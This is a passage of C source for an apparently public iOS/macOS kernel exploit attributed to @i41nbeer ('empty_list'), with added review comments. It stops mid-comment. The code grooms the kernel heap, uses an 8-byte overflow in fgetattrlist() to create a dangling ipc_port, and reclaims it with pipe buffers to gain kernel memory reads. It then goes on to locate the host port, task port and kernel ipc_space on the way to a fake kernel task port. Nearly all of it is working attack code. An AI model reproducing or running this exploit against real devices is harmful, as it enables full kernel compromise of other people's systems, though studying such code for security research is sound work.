                   (mach_msg_size_t)msg_size,//sizeof(struct kalloc_16_send_msg),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    // A failed send is only reported; the port is returned anyway, so the
    // caller cannot tell that this slot of the groom holds no allocation.
    if (err != KERN_SUCCESS) {
        printf("sending kalloc.16 message failed %s\n", mach_error_string(err));
    }

    return port;
}

#define N_MIDDLE_PORTS 50000
mach_port_t middle_ports[N_MIDDLE_PORTS];
int next_middle_port = 0;

// Allocate one receive right (plus a send right) and record it in
// middle_ports. These are the ipc_port objects the groom interleaves with
// the kalloc.16 pages; one of them becomes the overflow target.
// NOTE(review): the send right is inserted before err is checked, so on an
// allocation failure it is applied to an uninitialised name, and the name is
// still recorded. There is no bound check against N_MIDDLE_PORTS (vfs_sploit
// allocates far fewer than 50000).
mach_port_t alloc_middle_port() {
    mach_port_t port;
    kern_return_t err;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // added
    if (err != KERN_SUCCESS) {
        printf("failed to alloc middle port\n");
    }
    middle_ports[next_middle_port++] = port;
    return port;
}

// Variable-length message: header plus allocs_per_message OOL ports
// descriptors (zero-length trailing array, sized at runtime by hold_kallocs()).
struct ool_multi_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_ool_ports_descriptor_t ool_ports[0];
};

// Make many kernel allocations of one size and keep them alive.
//
// Each message carries allocs_per_message OOL ports descriptors, each naming
// kalloc_size/8 ports; the kernel copies every descriptor into its own
// kalloc_size-byte pointer array. messages_to_send copies are queued on
// holder_port, or on a fresh receive right whose queue limit is raised to
// MACH_PORT_QLIMIT_LARGE. Total kernel allocations made:
// allocs_per_message * messages_to_send, each kalloc_size bytes.
//
// source_ports, when non-NULL, supplies the names that fill each array and
// must hold at least kalloc_size/8 entries (not checked here - the caller is
// responsible); otherwise every entry is MACH_PORT_NULL.
//
// Returns the holder port; to free the allocations either receive the
// messages or destroy the port. Returns MACH_PORT_NULL when messages_to_send
// exceeds the queue limit. An individual failed send is only printed, so the
// caller cannot rely on exactly messages_to_send having been queued.
mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messages_to_send, mach_port_t holder_port, mach_port_t* source_ports) {
    if (messages_to_send > MACH_PORT_QLIMIT_LARGE) {
        printf("****************** too many messages\n");
        return MACH_PORT_NULL;
    }

    kern_return_t err;
    mach_port_t port = MACH_PORT_NULL;

    if (holder_port == MACH_PORT_NULL) {
        err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
        // inserted before err is checked, same pattern as alloc_middle_port()
        mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

        if (err != KERN_SUCCESS) {
            printf("failed to allocate port for hold kallocs\n");
        }

        // bump up the number of messages we can enqueue:
        mach_port_limits_t limits = {0};
        limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
        err = mach_port_set_attributes(mach_task_self(),
                                       port,
                                       MACH_PORT_LIMITS_INFO,
                                       (mach_port_info_t)&limits,
                                       MACH_PORT_LIMITS_INFO_COUNT);
        if (err != KERN_SUCCESS) {
            printf(" [-] failed to increase queue limit\n");
            exit(EXIT_FAILURE);
        }
    } else {
        port = holder_port;
    }

    // these are MACH_PORT_NULL (calloc zero-fills)
    mach_port_t* ports_to_send = calloc(kalloc_size/8, sizeof(mach_port_name_t));

    // sized for one descriptor more than is used (the reason is not recorded)
    size_t message_size = offsetof(struct ool_multi_msg, ool_ports[allocs_per_message+1]);
    struct ool_multi_msg* msg = malloc(message_size);

    memset(msg, 0, message_size);

    msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->hdr.msgh_size = (uint32_t) message_size;
    msg->hdr.msgh_remote_port = port;
    msg->hdr.msgh_local_port = MACH_PORT_NULL;
    msg->hdr.msgh_id = 0x12340101;

    msg->body.msgh_descriptor_count = allocs_per_message;

    // every descriptor points at the same user buffer; the kernel makes a
    // separate copy per descriptor
    for (int i = 0; i < allocs_per_message; i++) {
        msg->ool_ports[i].address = source_ports != NULL ? source_ports : ports_to_send;
        msg->ool_ports[i].count = kalloc_size/8;
        msg->ool_ports[i].deallocate = 0;
        msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
        msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
        msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY;
    }

    for (int i = 0; i < messages_to_send; i++) {
        // send it:
        err = mach_msg(&msg->hdr,
                       MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                       (uint32_t)message_size,
                       0,
                       MACH_PORT_NULL,
                       MACH_MSG_TIMEOUT_NONE,
                       MACH_PORT_NULL);
        if (err != KERN_SUCCESS) {
            printf("%s\n", mach_error_string(err));
            //exit(EXIT_FAILURE);
        }
    }
    free(ports_to_send);
    free(msg);

    return port;
}

// Single shared receive buffer for discard_message().
uint8_t msg_buf[10000];

// Receive one queued message from port and destroy it, releasing whatever
// the kernel held for it (for the messages above: the kalloc'd pointer
// arrays behind the OOL descriptors).
// NOTE(review): there is no MACH_RCV_TIMEOUT flag and the timeout argument is
// 0, so this blocks indefinitely if nothing is queued on port. Only pass
// ports known to hold a message.
void discard_message(mach_port_t port) {
    mach_msg_header_t* msg = (mach_msg_header_t*)msg_buf;
    kern_return_t err;
    err = mach_msg(msg,
                   MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout
                   0,
                   10000,
                   port,
                   0,
                   0);
    if (err != KERN_SUCCESS){
        printf("error receiving on port: %s\n", mach_error_string(err));
    }

    mach_msg_destroy(msg);
}

// NOTE(review): the header name after this #include was lost in rendering;
// struct attrlist, the ATTR_* constants and fgetattrlist() come from the
// sys/attr.h header.
#include

int vfs_fd = -1;
struct attrlist al = {0};
size_t attrBufSize = 16;
void* attrBuf = NULL;

// Prepare the fgetattrlist() call that triggers the bug: a read-only handle
// on the filesystem root, an attrlist asking for ATTR_CMN_RETURNED_ATTRS and
// a broad (0xfff) set of volume attributes, and a 16-byte result buffer.
// NOTE(review): if open() fails this returns after perror() with vfs_fd still
// -1; do_vfs_overflow() then fails quietly every time and the groom in
// vfs_sploit() never gets an overflow, with no indication of why.
void prepare_vfs_overflow() {
    vfs_fd = open("/", O_RDONLY);
    if (vfs_fd == -1) {
        perror("unable to open fs root\n");
        return;
    }


    al.bitmapcount = ATTR_BIT_MAP_COUNT;
    al.volattr = 0xfff;
    al.commonattr = ATTR_CMN_RETURNED_ATTRS;

    attrBuf = malloc(attrBufSize);
}

// Trigger the bug once: this will do a kalloc.16, overflow out of it with
// 8 NULL bytes, then free it. The return value is not used.
void do_vfs_overflow() {
    int options = 0;
    int err = fgetattrlist(vfs_fd, &al, attrBuf, attrBufSize, options);
    //printf("err: %d\n", err);
}

mach_port_t
initial_early_kallocs[80000];
int next_early_kalloc = 0;

mach_port_t middle_kallocs[80000];
int next_middle_kalloc = 0;


// in the end I don't use these, but maybe they help?
// (busy-loop threads started before the groom and joined after it)

volatile int keep_spinning = 1;
void* spinner(void* arg) {
    while(keep_spinning);
    return NULL;
}

#define N_SPINNERS 25
pthread_t spin_threads[N_SPINNERS];

void start_spinners() {
    for (int i = 0; i < N_SPINNERS; i++) {
        pthread_create(&spin_threads[i], NULL, spinner, NULL);
    }
}

void stop_spinners() {
    keep_spinning = 0;
    for (int i = 0; i < N_SPINNERS; i++) {
        pthread_join(spin_threads[i], NULL);
    }
}

// Pipe pool used to reclaim freed 0x1000-byte objects: 14 rounds of 0x1f*8
// pipes, exactly the dangler_hits cap in vfs_sploit().
const int total_fds = 14*0x1f*8;
int read_ends[total_fds];
int write_ends[total_fds];
int next_pipe_index = 0;

mach_port_t early_read_port = MACH_PORT_NULL;
int early_read_read_fd = -1;
int early_read_write_fd = -1;
uint64_t early_read_known_kaddr = 0;

// read_fd and write_fd are the pipe fds which have a pipe buffer at known_addr
// target_port is the dangling port whose ipc_port memory that pipe buffer now
// backs; all four are stashed in the globals above for early_rk32().
void prepare_early_read_primitive(mach_port_t target_port, int read_fd, int write_fd, uint64_t known_kaddr) {
    early_read_port = target_port;
    early_read_read_fd = read_fd;
    early_read_write_fd = write_fd;
    early_read_known_kaddr = known_kaddr;
}

// Early 4-byte kernel read.
// Drains the pipe, rewrites its buffer with a fake task-port image
// (build_fake_task_port is defined elsewhere in this file) laid out so that
// pid_for_task() on the dangling port returns the 32 bits at kaddr, then
// performs that call.
// NOTE(review): the read()/write() return values are not checked (a short
// read would leave stale bytes queued), and a failing pid_for_task() only
// prints - the caller receives 0 and cannot tell it from a genuine zero.
uint32_t early_rk32(uint64_t kaddr) {
    uint8_t* buf = malloc(0xfff);
    read(early_read_read_fd, buf, 0xfff);
    build_fake_task_port(buf, early_read_known_kaddr, kaddr, 0, 0, 0);
    write(early_read_write_fd, buf, 0xfff);

    uint32_t val = 0;
    kern_return_t err = pid_for_task(early_read_port, (int *)&val);
    if (err != KERN_SUCCESS) {
        printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
    }
    printf("read val via pid_for_task: %08x\n", val);
    free(buf);
    return val;
}

// Early 8-byte kernel read: two early_rk32() calls, little-endian combined.
uint64_t early_rk64(uint64_t kaddr) {
    uint64_t lower = (uint64_t)early_rk32(kaddr);
    uint64_t upper = (uint64_t)early_rk32(kaddr + 4);
    uint64_t final = lower | (upper << 32);
    return final;
}

// Kernel exploit entry point ("empty_list").
//
// Stages, in order:
//  1. groom the zone heap so kalloc.16 pages alternate with ipc_port pages;
//  2. free one kalloc.16, trigger the 8-byte NULL overflow in fgetattrlist()
//     into the neighbouring ipc_port and detect which port lost io_active;
//  3. drop that port's last reference while its port-table entry survives
//     (a dangling ipc_port), then push the zone through a GC so the memory
//     is reused by 0x1000-byte OOL port arrays and later pipe buffers we
//     control;
//  4. use ip_context / pid_for_task on the dangling port as a kernel
//     address leak and 4-byte read, locate the host port, our task port,
//     the kernel ipc_space and the kernel vm_map;
//  5. rewrite the pipe buffer backing the dangling port into a fake kernel
//     task port (tfp0) and hand it to prepare_for_rw_with_fake_tfp0().
//
// Most failure paths only print; the code presses on with zero/NULL values
// (see the NOTE(review) comments), so a failed run tends to end in a panic
// rather than a clean error. Per the closing messages, the resulting tfp0
// outlives this process: any task that obtains a send right to it gets full
// kernel memory read/write.
void vfs_sploit() {
    printf("empty_list by @i41nbeer\n");
    offsets_init();

    start_spinners();
    printf("vfs_sploit\n");
    increase_limits();

    size_t kernel_page_size = 0;
    host_page_size(mach_host_self(), &kernel_page_size);
    if (kernel_page_size == 0x4000) {
        printf("this device uses 16k kernel pages\n");
    } else if (kernel_page_size == 0x1000) {
        printf("this device uses 4k kernel pages\n");
    } else {
        printf("this device uses an unsupported kernel page size\n");
        exit(EXIT_FAILURE);
    }


    prepare_vfs_overflow();
    // set up the heap:

    // allocate a pool of early ports; we'll use some of these later
    alloc_early_ports();

    // 4k devices only: 100*100 kalloc.16 allocations that are never released
    // (the holder port is dropped on the floor, so they live until exit)
    if (kernel_page_size == 0x1000) {
        mach_port_t initial_kallocs_holder = hold_kallocs(0x10, 100, 100, MACH_PORT_NULL, NULL);
    }

    // 0x110 will be the kalloc size of the ipc_kmsg allocation for the kalloc.16 messages
    // we need to ensure that these allocations don't interfere with the page-level groom,
    // so ensure there's a long freelist for them

    // make 100*500 = 50'000 kalloc(0x110) calls then free them all
    // (the original comment said 30'000; the arguments give 50'000)
    mach_port_t flp = hold_kallocs(0x110, 100, 500, MACH_PORT_NULL, NULL);
    mach_port_destroy(mach_task_self(), flp);

    // try to groom our initial pattern:
    // kalloc.16 | ipc_ports | kalloc.16 | ipc_ports ...
    // first off we're just trying to get the pages like that

    int INITIAL_PATTERN_REPEATS = kernel_page_size == 0x4000 ? 40 : 60;
    mach_port_t kalloc_holder_port = MACH_PORT_NULL;


    // one zcram worth of each zone; 0xa8 is the ipc_port size assumed below
    int kallocs_per_zcram = (int)kernel_page_size/0x10; // 0x1000 with small kernel pages, 0x4000 with large
    int ports_per_zcram = kernel_page_size == 0x1000 ? 0x49 : 0x61; // 0x3000 with small kernel pages, 0x4000 with large

    // NOTE(review): the inner loops re-declare i, shadowing the outer index.
    for (int i = 0; i < INITIAL_PATTERN_REPEATS; i++) {
        // 1 page of kalloc
        for (int i = 0; i < kallocs_per_zcram; i++) {
            mach_port_t p = kalloc_16();
            initial_early_kallocs[next_early_kalloc++] = p;
        }

        // 1 full allocation set of ports:
        for (int i = 0; i < ports_per_zcram; i++) {
            mach_port_t port = alloc_middle_port();
        }
    }

    // now we hopefully have a nice arrangement of repeated fresh 'k.16 | ipc_port' pages
    // to understand this next bit it's important to notice that zone allocations will come first
    // from intermediate (partially full) pages. This means that if we just start free'ing and
    // allocating k.16 objects somewhere in the middle of the groom they won't be re-used until
    // the current intermediate page is either full or empty.

    // this provides a challenge because fresh page's freelist's are filled semi-randomly such that
    // their allocations will go from the inside to the outside:
    //
    // | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page
    //
    // this means that our final intermediate k.16 and ports pages will look a bit like this:
    //
    // | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - |
    //   kalloc.16             ipc_ports

    // if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we
    // need to avoid that

    // the trick is that by controlling the allocation and free order we can reverse the freelists such that
    // the final intermediate pages will look more like this:
    //
    // | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
    //   kalloc.16             ipc_ports
    //
    // at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow
    // such that we can hit the first qword of an ipc_port


    // free them all, reversing the freelists!
    for (int i = 0; i < next_early_kalloc; i++) {
        discard_message(initial_early_kallocs[i]);
    }

    int HOP_BACK = kernel_page_size == 0x4000 ? 16 : 30;

    // re-fill all but the last HOP_BACK zcrams worth of kalloc.16
    for (int i = 0; i < INITIAL_PATTERN_REPEATS - HOP_BACK; i++) {
        for (int i = 0; i < kallocs_per_zcram; i++) {
            mach_port_t p = kalloc_16();
            middle_kallocs[next_middle_kalloc++] = p;
        }
    }

    mach_port_t target_port = MACH_PORT_NULL;

    // the ports expected to neighbour the kalloc.16 page being worked on:
    // a window of four zcrams around HOP_BACK iterations from the end
    int first_candidate_port_index = next_middle_port - ((HOP_BACK+2)*ports_per_zcram); // 32 35 +2
    int last_candidate_port_index = next_middle_port - ((HOP_BACK-2)*ports_per_zcram); // 28 25 -2

    //sched_yield();
    // wait a second
    // this is a load-bearing sleep - this works better than sched_yield
    // we want this loop to be as fast as possible, and ideally not get pre-empted
    // don't remove this :)
    sleep(1);
    // free / overflow / realloc, walking backwards from the 21st-newest
    // kalloc.16, until one of the candidate ports shows up as corrupted
    for (int i = 0; i < kallocs_per_zcram; i++) {
        mach_port_t kp = middle_kallocs[next_middle_kalloc-20-1];
        next_middle_kalloc--;

        discard_message(kp);

        do_vfs_overflow();

        // realloc
        mach_port_t replacer_f = kalloc_16();

        // loop through the candidate overwrite target ports and see if they were hit
        // we can detect this via mach_port_kobject; if we know the name we pass it is valid
        // but we get KERN_INVALID_RIGHT then we cleared the io_active bit

        for (int j = first_candidate_port_index; j < last_candidate_port_index; j++){
            mach_port_t candidate_port = middle_ports[j];
            kern_return_t err;
            natural_t typep = 0;
            mach_vm_address_t addr = 0;

            err = mach_port_kobject(mach_task_self(),
                                    candidate_port,
                                    &typep,
                                    &addr);
            if (err != KERN_SUCCESS) {
                printf("found the port! %x\n", candidate_port);
                target_port = candidate_port;
                break;
            }
        }
        if (target_port != MACH_PORT_NULL) {
            break;
        }
    }

    stop_spinners();

    // NOTE(review): if no candidate was hit, target_port is still
    // MACH_PORT_NULL here and nothing bails out; everything below then
    // operates on a NULL name and on zero addresses.

    // lets stash the ports we want to keep:

    // we know the dangling port is about 30 loops back from the end of the middle_ports
    // lets keep hold of a region about 3 loop iterations ahead of this

#define CANARY_REGION 4

    int ports_to_hold = ports_per_zcram; //ports_per_zcram * 3;//0x49*3;
    mach_port_t hold_ports[ports_to_hold];
    for (int i = 0; i < ports_to_hold; i++) {
        int source_index = ((INITIAL_PATTERN_REPEATS - HOP_BACK + CANARY_REGION) * ports_per_zcram) + i; // 20 10
        hold_ports[i] = middle_ports[source_index];
        middle_ports[source_index] = MACH_PORT_NULL;
    }

    // now dump all our ports
    // we can keep the early ports, we'll continue to use them for kallocs and stuff

    for (int i = 0; i < next_middle_port; i++) {
        mach_port_t port = middle_ports[i];
        if (port == MACH_PORT_NULL) {
            continue;
        }
        if (port == target_port) {
            // cause the target port to be freed but leave us a dangling entry in the port table
            // note that the port isn't active so we need a code path which will take and drop a reference
            // but won't do anything if the port isn't active (like trying to give us a DEAD_NAME)
            // this is the point at which the ipc_port becomes a use-after-free
            int new_size = 100;
            kern_return_t err = mach_port_set_attributes(mach_task_self(), target_port, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)&new_size, sizeof(int));
            if (err != KERN_SUCCESS) {
                printf("mach_port_set_attributes failed %s\n", mach_error_string(err));
            } else {
                printf("freed the port\n");
            }
        } else {
            mach_port_destroy(mach_task_self(), port);
        }
    }

    // 150MB (3 * 0x3e * 400 * 0x800 bytes) of kalloc.2048, allocated then freed
#define N_COLLECTABLES 3
    mach_port_t collectable_ports[N_COLLECTABLES];
    for (int i = 0; i < N_COLLECTABLES; i++) {
        collectable_ports[i] = hold_kallocs(0x800, 0x3e, 400, MACH_PORT_NULL, NULL);
    }

    for (int i = 0; i < N_COLLECTABLES; i++) {
        mach_port_destroy(mach_task_self(), collectable_ports[i]);
    }


    // choose a port from the middle of the holder range as our canary:
    mach_port_t canary_port = hold_ports[ports_to_hold/2];
    mach_port_insert_right(mach_task_self(), canary_port, canary_port, MACH_MSG_TYPE_MAKE_SEND);


    // now try to cause the GC by allocating many copies of the replacer object:
    // the goal is to get the canary port overlapping the ip_context field of the dangling port
    // replacer_object is a 0x1000-byte image of port names; once copied in
    // by the kernel, the slot at the ip_context offset holds the canary
    // port's kernel pointer, which mach_port_get_context() on the dangling
    // port then leaks back to us
    mach_port_t replacer_object[0x200] = {0};
    replacer_object[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8] = canary_port;

    // the replacer object allocation is a 0x1000 alloc
    // using the same maths as above lets allocate 200 MB of them,
    // slowly, hoping to cause GC:
    //int n_gc_ports = 200;
    int n_gc_ports = 250; // 200
    mach_port_t gc_ports[n_gc_ports];
    for (int i = 0; i < n_gc_ports; i++) {
        gc_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, replacer_object);
        printf("gc tick %d\n", i);
        pthread_yield_np();
        usleep(10000);
    }
    printf("did that trigger a gc and realloc?\n");

    // if that worked we should now be able to find the address of the canary port:
    // NOTE(review): on failure canary_port_kaddr stays 0 and is still used
    // as the base for every address computed below.
    uint64_t canary_port_kaddr = 0;
    kern_return_t err;
    err = mach_port_get_context(mach_task_self(), target_port, (mach_port_context_t *)&canary_port_kaddr);
    if (err != KERN_SUCCESS) {
        printf("error getting context from the target port (but no panic...): %s\n", mach_error_string(err));
    }

    printf("the canary port is at %016llx\n", canary_port_kaddr);

    // lets modify the port so we can detect when we receive the message which has the OOL_PORTS descriptor which
    // overlaps the dangling target port:
    // (ip_context of the dangling port is a slot in one of the OOL arrays;
    // on receive the kernel turns that slot back into a port name for us, so
    // the descriptor overlapping the dangler yields a name that is not
    // canary_port - the port 0xa8 bytes after it in the zone)

    // we should be a bit more careful doing this to not go off the end:
    uint64_t fake_canary_kport_addr = canary_port_kaddr + 0xa8;

    err = mach_port_set_context(mach_task_self(), target_port, fake_canary_kport_addr);


    // lets build the contents of the pipe buffer
    // we're gonna hope that we can get this allocated pretty near the canary port:
    size_t pipe_buffer_size = 0xfff; // this is for kalloc.4096
    uint8_t* pipe_buf = malloc(0x1000);
    memset(pipe_buf, 0, 0x1000);

    uint64_t pipe_target_kaddr_offset = kernel_page_size == 0x4000 ? 0x20000 : 0x10000;

    // guessed address of one of the pipe buffers; confirmed empirically below
    uint64_t pipe_target_kaddr = (canary_port_kaddr + pipe_target_kaddr_offset) & (~0xfffULL); // 0x10000
    printf("pipe_target_kaddr: %016llx\n", pipe_target_kaddr);

    build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, 0);


    // now go through each of the hold_kalloc messages and receive them.
    // check if they contained the canary port
    // reallocate them

    // NOTE(review): sized 200 but indexed by i < n_gc_ports (250); if the
    // dangler is not hit within the first 200 gc ports the writes below run
    // off the end of this stack array. n_gc_ports was raised from 200 without
    // resizing this.
    mach_port_t secondary_leaker_ports[200] = {0};

    // receive buffer: 0x1f descriptors + trailer, with slack
    struct {
        mach_msg_header_t hdr;
        mach_msg_body_t body;
        mach_msg_ool_ports_descriptor_t ool_ports[0x1f];
        mach_msg_trailer_t trailer;
        char pad[1000];
    } msg = {0};

    printf("sizeof(msg) 0x%x\n", (unsigned int)sizeof(msg));

    int hit_dangler = 0;
    int dangler_hits = 0;
    printf("the canary port is: %x\n", canary_port);

    mach_port_t fake_canary_port = MACH_PORT_NULL;

    for (int i = 0; i < n_gc_ports; i++) {
        mach_port_t gc_port = gc_ports[i];

        for (int j = 0; j < 8; j++) {
            err = mach_msg(&msg.hdr,
                           MACH_RCV_MSG,
                           0,
                           sizeof(msg),
                           gc_port,
                           0,
                           0);
            if (err != KERN_SUCCESS) {
                printf("failed to receive OOL_PORTS message (%d,%d) %s\n", i, j, mach_error_string(err));
            }

            // check each of the canary ports:
            // (the OOL arrays the kernel mapped into us on receive are never
            // vm_deallocate'd here - presumably acceptable for a one-shot run)
            for (int k = 0; k < 0x1f; k++) {
                mach_port_t* ool_ports = msg.ool_ports[k].address;
                mach_port_t tester_port = ool_ports[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8];
                if (tester_port != canary_port) {
                    printf("found the mis-matching OOL discriptor (%x)\n", tester_port);
                    hit_dangler = 1;
                    fake_canary_port = tester_port;
                } else {
                    // drop the UREF
                    mach_port_deallocate(mach_task_self(), tester_port);
                }
            }
        }

        if (!hit_dangler) {
            // if we haven't yet hit the dangler, try to reallocate this memory:
            secondary_leaker_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, NULL);
        } else {
            if (dangler_hits == 14) {
                // we'll run out of pipe kva so stop now
                // (14 * 0x1f*8 pipes is exactly total_fds)
                printf("hopefully that's enough pipes\n");
                break;
            }
            // NOTE(review): this i shadows the gc-port index, and the err
            // below shadows the kern_return_t err of the enclosing scope.
            for (int i = 0; i < (0x1f*8); i++) {
                // we have hit the dangler; from now on out we'll realloc with pipes
                // pipe memory is limited
                int fds[2] = {0};
                int err = pipe(fds);
                if (err != 0) {
                    perror("pipe failed\n");
                }

                int read_end = fds[0];
                int write_end = fds[1];

                // non-blocking so a full buffer cannot hang the loop
                int flags = fcntl(write_end, F_GETFL);
                flags |= O_NONBLOCK;
                fcntl(write_end, F_SETFL, flags);

                // the last argument stamps this pipe's index into the image, so
                // mach_port_get_context() on the dangling port later tells us
                // which pipe replaced it
                build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, next_pipe_index);

                // 0xfff bytes so the pipe buffer comes from kalloc.4096
                ssize_t amount_written = write(write_end, pipe_buf, 0xfff);
                if (amount_written != 0xfff) {
                    printf("amount written was short: 0x%x\n", (unsigned int)amount_written);
                }

                read_ends[next_pipe_index] = read_end;
                write_ends[next_pipe_index++] = write_end;

            }
            dangler_hits++;
        }

    }


    printf("replaced with pipes hopefully... take a look\n");

    // check the kernel object type of the dangling port:
    int otype = 0;
    mach_vm_address_t oaddr = 0;
    err = mach_port_kobject(mach_task_self(), target_port, (natural_t *)&otype, &oaddr);
    if (err != KERN_SUCCESS) {
        printf("mach_port_kobject failed: %x %s\n", err, mach_error_string(err));
    }
    printf("dangling port type: %x\n", otype);

    // NOTE(review): if get_context fails this stays 0xfffffff and is later
    // used to index read_ends/write_ends unchecked.
    uint64_t replacer_pipe_index = 0xfffffff;
    err = mach_port_get_context(mach_task_self(), target_port, (mach_port_context_t *)&replacer_pipe_index);
    printf("got replaced with pipe fd index %d\n", (int)replacer_pipe_index);

    printf("gonna try a read...\n");

    uint32_t val = 0;
    err = pid_for_task(target_port, (int *)&val);
    if (err != KERN_SUCCESS) {
        printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
    }
    printf("read val via pid_for_task: %08x\n", val);


    // at this point we know:
    // * which pipe fd overlaps with the dangling port
    // * the kernel address of the canary port (which is still a dangling port)
    // * the kernel address of the fake task (which is a pipe buffer, but we don't know which one)

    // things will be easier if we can learn the address of the dangling port giving us the address of the pipe buffer and a what/where primitive
    // we could hack around that by always rewriting all the pipes each time I guess...

    // for each pipe, apart from the one which we know overlaps with the port, replace the field which determines where to read from, then do the kernel read and see if the value is no longer 0x80000002
    // (0x80000002 is what the read at pipe_target_kaddr+0 returns - presumably
    // the fake port's io_bits, cf. IO_BITS_ACTIVE | IKOT_TASK below; moving
    // the read to +4 changes the value only for the pipe that actually lives
    // at pipe_target_kaddr)
    char* old_contents = malloc(0xfff);
    char* new_contents = malloc(0xfff);
    int pipe_target_kaddr_replacer_index = -1;
    for (int i = 0; i < next_pipe_index; i++) {
        if (i == replacer_pipe_index) {
            continue;
        }
        read(read_ends[i], old_contents, 0xfff);
        build_fake_task_port((uint8_t *)new_contents, pipe_target_kaddr, pipe_target_kaddr+4, 0, 0, 0);
        write(write_ends[i], new_contents, 0xfff);

        // try the read, did it change?
        uint32_t val = 0;
        err = pid_for_task(target_port, (int *)&val);
        if (err != KERN_SUCCESS) {
            printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
        }
        printf("read val via pid_for_task: %08x\n", val);
        if (val != 0x80000002) {
            printf("replacer fd index %d is at the pipe_target_kaddr\n", i);
            pipe_target_kaddr_replacer_index = i;
            break;
        }
    }
    free(old_contents);
    free(new_contents);
    // NOTE(review): on failure this only prints; the next line then indexes
    // read_ends[-1] / write_ends[-1].
    if (pipe_target_kaddr_replacer_index == -1) {
        printf("failed to find the pipe_target_kaddr_replacer pipe\n");
    }

    // now we know which pipe fd matches up with where the fake task is so
    // bootstrap the early read primitives

    prepare_early_read_primitive(target_port, read_ends[pipe_target_kaddr_replacer_index], write_ends[pipe_target_kaddr_replacer_index], pipe_target_kaddr);

    // we can now use early_rk{32,64}

    // send a message to the canary port containing a send right to the host port;
    // use the arbitrary read to find that, and from there find the kernel task port

    mach_msg_header_t host_msg = {0};
    host_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, MACH_MSG_TYPE_COPY_SEND);
    host_msg.msgh_size = sizeof(host_msg);
    host_msg.msgh_remote_port = canary_port;
    host_msg.msgh_local_port = mach_host_self();
    host_msg.msgh_id = 0x12344321;

    err = mach_msg(&host_msg,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   sizeof(host_msg),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    if (err != KERN_SUCCESS) {
        printf("failed to send host message to canary port %s\n", mach_error_string(err));
        //exit(EXIT_FAILURE);
    }
    printf("sent host_msg to canary port, let's find it and locate the host port\n");

    // the queued kmsg hangs off the canary port's message queue
    uint64_t host_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
    printf("host_kmsg: %016llx\n", host_kmsg);

    // hexdump the kmsg:
    //for (int i = 0; i < 100; i++) {
    //  uint64_t val = early_rk64(host_kmsg + (i*8));
    //  printf("%016llx: %016llx\n", host_kmsg + (i*8), val);
    //}
    uint64_t host_port_kaddr = early_rk64(host_kmsg + 0xac); // could parse the message to find this rather than hardcode

    // do the same thing again to get our task port:
    discard_message(canary_port);

    host_msg.msgh_local_port = mach_task_self();
    err = mach_msg(&host_msg,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   sizeof(host_msg),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    if (err != KERN_SUCCESS) {
        printf("failed to send host message to canary port %s\n", mach_error_string(err));
        //exit(EXIT_FAILURE);
    }
    printf("sent task_msg to canary port, let's find it and locate the host port\n");

    uint64_t task_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
    printf("task_kmsg: %016llx\n", task_kmsg);


    // NOTE(review): this reads from host_kmsg, not the task_kmsg just
    // fetched (which is otherwise unused). It only yields our task port if
    // the second kmsg was allocated at the address the freed first one had;
    // the intended expression is presumably early_rk64(task_kmsg + 0xac).
    uint64_t task_port_kaddr = early_rk64(host_kmsg + 0xac);

    printf("our task port is at %016llx\n", task_port_kaddr);



    // now we can copy-paste some code from multi_path:
    // for the full read/write primitive we need to find the kernel vm_map and the kernel ipc_space
    // we can get the ipc_space easily from the host port (receiver field):
    uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));

    printf("ipc_space_kernel: %016llx\n", ipc_space_kernel);

    // the kernel vm_map is a little trickier to find
    // we can use the trick from mach_portal to find the kernel task port because we know it's gonna be near the host_port on the heap:

    // find the start of the zone block containing the host and kernel task pointers:
    // assumes 0xa8-byte ipc_ports packed from the start of a block of up to
    // three 4k pages; which page the host port is on follows from its
    // alignment. (The third branch's message says "second page"; it handles
